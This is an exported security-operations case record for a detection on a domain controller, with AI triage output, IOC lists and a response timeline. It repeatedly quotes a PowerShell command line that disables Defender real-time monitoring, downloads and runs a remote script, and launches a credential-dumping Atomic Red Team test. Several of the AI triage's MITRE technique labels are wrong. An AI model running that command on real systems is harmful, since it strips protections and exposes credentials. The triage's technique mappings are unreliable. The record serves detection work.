โ
Case #506
general.RealTime Monitoring Tampering
๐ท๏ธ Analyst Verdict Classification
SUSPICIOUS by analyst๐ค AI Analysis
๐ Detections (1)
Realtime Monitoring Tampering
high
Rule: general.RealTime Monitoring Tampering
Hostname: df-labsdc01.dflabs.local ยท Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 82% ยท Verdict: suspicious
Event Data:
BASE_ADDRESS:
140694944940032
COMMAND_LINE:
PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1003.004 -CheckPrereqs ; Invoke-AtomicTest T1003.004 -GetPrereqs ; Invoke-AtomicTest T1003.004
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
210673664
PARENT:
{'BASE_ADDRESS': 140698856259584, 'COMMAND_LINE': 'cmd.exe /C C:\\Windows\\TEMP\\pldC873.tmp.bat T1003.004 ', 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\cmd.exe', 'HASH': '3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2', 'MEMORY_USAGE': 4489216, 'PARENT_ATOM': 'd2b1ecad7af81b32ac16ae0d69c2a7fe', 'PARENT_PROCESS_ID': 3496, 'PROCESS_ID': 3600, 'THIS_ATOM': '603c0894c1efd30bc14ce13269c2a84d', 'THREADS': 3, 'TIMESTAMP': 1774364748698, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
3600
PROCESS_ID:
9092
THREADS:
30
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Set-ExecutionPolicy Unrestricted
Set-MpPreference -DisableRealtimeMonitoring $true
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)
Install-AtomicRedTeam -Force -getAtomics
Invoke-AtomicTest T1003.004 -CheckPrereqs
MITRE:
T1562.001 (Disable Antivirus)
T1059.001 (PowerShell)
T1078 (Remote Services)
T1562.003 (Disable Real-Time Monitoring)
Analyst Declaration:
๐ Raw Detection JSON
{
"author": "ckeller@fusioncybersecurity.us",
"cat": "Realtime Monitoring Tampering",
"detect": {
"event": {
"BASE_ADDRESS": 140694944940032,
"COMMAND_LINE": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1003.004 -CheckPrereqs ; Invoke-AtomicTest T1003.004 -GetPrereqs ; Invoke-AtomicTest T1003.004 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 210673664,
"PARENT": {
"BASE_ADDRESS": 140698856259584,
"COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldC873.tmp.bat T1003.004 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
"HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
"MEMORY_USAGE": 4489216,
"PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
"PARENT_PROCESS_ID": 3496,
"PROCESS_ID": 3600,
"THIS_ATOM": "603c0894c1efd30bc14ce13269c2a84d",
"THREADS": 3,
"TIMESTAMP": 1774364748698,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"PARENT_PROCESS_ID": 3600,
"PROCESS_ID": 9092,
"THREADS": 30,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"routing": {
"arch": 2,
"did": "",
"event_id": "6220d8dd-dafe-4022-bc42-39c50347f3cc",
"event_time": 1774364749274,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 2841,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "603c0894c1efd30bc14ce13269c2a84d",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "ce62e2fb3788a5371aa5449e69c2a84f"
}
},
"detect_id": "690bbfa7-9a41-4a6b-9f14-a19d69c2a850",
"gen_time": 1774364752117,
"link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364749\u0026selected=ce62e2fb3788a5371aa5449e69c2a84f",
"namespace": "general",
"routing": {
"arch": 2,
"did": "",
"event_id": "6220d8dd-dafe-4022-bc42-39c50347f3cc",
"event_time": 1774364749274,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 2841,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "603c0894c1efd30bc14ce13269c2a84d",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "ce62e2fb3788a5371aa5449e69c2a84f"
},
"source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
"source_rule": "general.RealTime Monitoring Tampering",
"ts": 1774364752000
}
๐ Threat Intel JSON
{
"virustotal": {
"malicious": false,
"provider": "virustotal",
"reputation": 73,
"stats": {
"confirmed-timeout": 0,
"failure": 0,
"harmless": 0,
"malicious": 0,
"suspicious": 0,
"timeout": 0,
"type-unsupported": 4,
"undetected": 72
}
}
}
๐ค Triage JSON
{
"confidence": 0.825,
"false_positive_reason": null,
"investigation_questions": [
"What user account was used to execute this process?",
"Are there any other processes spawned from this PowerShell instance?",
"Has the host been connected to external networks recently?",
"Were there any failed login attempts prior to this event?"
],
"ioc_analysis": "The process is running PowerShell from its expected location but executing highly suspicious commands including disabling real-time monitoring (Set-MpPreference), using Invoke-Expression with IEX, and explicitly invoking Atomic Red Team tests. The command line shows clear intent to bypass security controls and test for T1003.004 (Lateral Movement).",
"iocs_extracted": [
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Set-ExecutionPolicy Unrestricted",
"Set-MpPreference -DisableRealtimeMonitoring $true",
"IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)",
"Install-AtomicRedTeam -Force -getAtomics",
"Invoke-AtomicTest T1003.004 -CheckPrereqs"
],
"mitre_techniques": [
"T1562.001 (Disable Antivirus)",
"T1059.001 (PowerShell)",
"T1078 (Remote Services)",
"T1562.003 (Disable Real-Time Monitoring)"
],
"recommended_actions": [
"Manual analyst review required \u2014 AI models (split)",
"Isolate the host immediately to prevent lateral movement",
"Block outbound traffic to redcanaryco domains and GitHub raw.githubusercontent.com",
"Review all PowerShell execution policies on the system",
"Check for persistence mechanisms in startup folders or registry",
"Analyze network connections for C2 communication"
],
"risk_score": 82,
"severity": "high",
"summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious activity where an attacker is disabling real-time monitoring and deploying the Atomic Red Team framework to test for lateral movement capabilities.\n\n**IOC Analysis:** The process is running PowerShell from its expected location but executing highly suspicious commands including disabling real-time monitoring (Set-MpPreference), using Invoke-Expression with IEX, and explicitly invoking Atomic Red Team tests. The command line shows clear intent to bypass security controls and test for T1003.004 (Lateral Movement).\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe PowerShell process from C:\\Windows\\System32\\ is legitimate and signed, but the command line attempts to disable real-time monitoring and download/install malicious scripts, indicating suspicious activity.\n\n**IOC Analysis:** The file path C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is a known legitimate Windows binary. However, the command line includes commands to set execution policy, disable real-time monitoring, and download scripts from GitHub, which are suspicious indicators of evasion and unauthorized system changes. The hash is signed, but the behavior suggests potential malicious intent.",
"verdict": "suspicious",
"voting": {
"auto_action": "manual_review",
"mode": "split",
"total_models": 2,
"vote_summary": [
"qwen3.5:4b: true_positive (critical, 95% confidence)",
"deepseek-r1:8b: suspicious (high, 70% confidence)"
],
"votes": [
{
"confidence": 0.95,
"model": "qwen3.5:4b",
"verdict": "true_positive"
},
{
"confidence": 0.7,
"model": "deepseek-r1:8b",
"verdict": "suspicious"
}
],
"winning_count": 1,
"winning_verdict": "suspicious"
}
}
โ๏ธ Response Actions
| Action | Target | Status | Result | |
|---|---|---|---|---|
| tag | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Lateral Movement Investigation: 50 events found | ||
| recommended | executed | User Activity Investigation: 31 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Persistence Check: 0 events found | ||
| recommended | executed | Network Activity Investigation: 50 events found |
๐ Add Note
๐ฌ Notes (7)
๐ค FusionSOC AI
2026-03-24T16:32
๐ค FusionSOC AI
2026-03-24T16:32
๐ค FusionSOC AI
2026-03-24T16:32
๐ค FusionSOC AI
2026-03-24T16:32
๐ค FusionSOC AI
2026-03-24T16:32
๐ค FusionSOC AI
2026-03-24T16:32
๐ค FusionSOC AI
2026-03-24T16:32
๐ Timeline
2026-03-24T17:30:27
analyst
Status changed: investigating โ closed
2026-03-24T17:30:23
analyst
Analyst classified as Suspicious (SUSPICIOUS)
2026-03-24T16:32:49
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:32:49
FusionSOC
Action recommended โ executed: Network Activity Investigation: 50 events found
2026-03-24T16:32:49
FusionSOC AI
Note by FusionSOC AI: ## ๐ Network Activity Investigation **Action:** Analyze network connections for C2 communication **Sensor:** `e4a1c62d-4...
2026-03-24T16:32:48
FusionSOC
Response action queued: recommended on Analyze network connections for C2 communication
2026-03-24T16:32:48
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:32:48
FusionSOC
Action recommended โ executed: Persistence Check: 0 events found
2026-03-24T16:32:48
FusionSOC AI
Note by FusionSOC AI: ## ๐ Persistence Check **Action:** Check for persistence mechanisms in startup folders or registry **Sensor:** `e4a1c62d...
2026-03-24T16:32:47
FusionSOC
Response action queued: recommended on Check for persistence mechanisms in startup folders or registry
2026-03-24T16:32:47
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:32:47
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T16:32:47
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Review all PowerShell execution policies on the system **Sensor:** `e4a1c62d-4d1...
2026-03-24T16:32:47
FusionSOC
Response action queued: recommended on Review all PowerShell execution policies on the system
2026-03-24T16:32:47
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:32:47
FusionSOC
Action recommended โ executed: User Activity Investigation: 31 events found
2026-03-24T16:32:47
FusionSOC AI
Note by FusionSOC AI: ## ๐ User Activity Investigation **Action:** Block outbound traffic to redcanaryco domains and GitHub raw.githubusercont...
2026-03-24T16:32:46
FusionSOC
Response action queued: recommended on Block outbound traffic to redcanaryco domains and GitHub raw.githubusercontent.com
2026-03-24T16:32:46
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:32:46
FusionSOC
Action recommended โ executed: Lateral Movement Investigation: 50 events found
2026-03-24T16:32:46
FusionSOC AI
Note by FusionSOC AI: ## ๐ Lateral Movement Investigation **Action:** Isolate the host immediately to prevent lateral movement **Sensor:** `e4...
2026-03-24T16:32:45
FusionSOC
Response action queued: recommended on Isolate the host immediately to prevent lateral movement
2026-03-24T16:32:45
FusionSOC AI
Status changed: open โ investigating
2026-03-24T16:32:45
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T16:32:45
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Manual analyst review required โ AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T16:32:44
FusionSOC
Response action queued: recommended on Manual analyst review required โ AI models (split)
2026-03-24T16:32:44
FusionSOC
Action tag โ failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T16:32:44
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T16:32:44
FusionSOC AI
Detection 690bbfa7-9a41-4a6b-9f14-a19d69c2a850 triaged as suspicious (high severity, confidence: 82%)
2026-03-24T16:32:44
FusionSOC AI
Case created from detection: general.RealTime Monitoring Tampering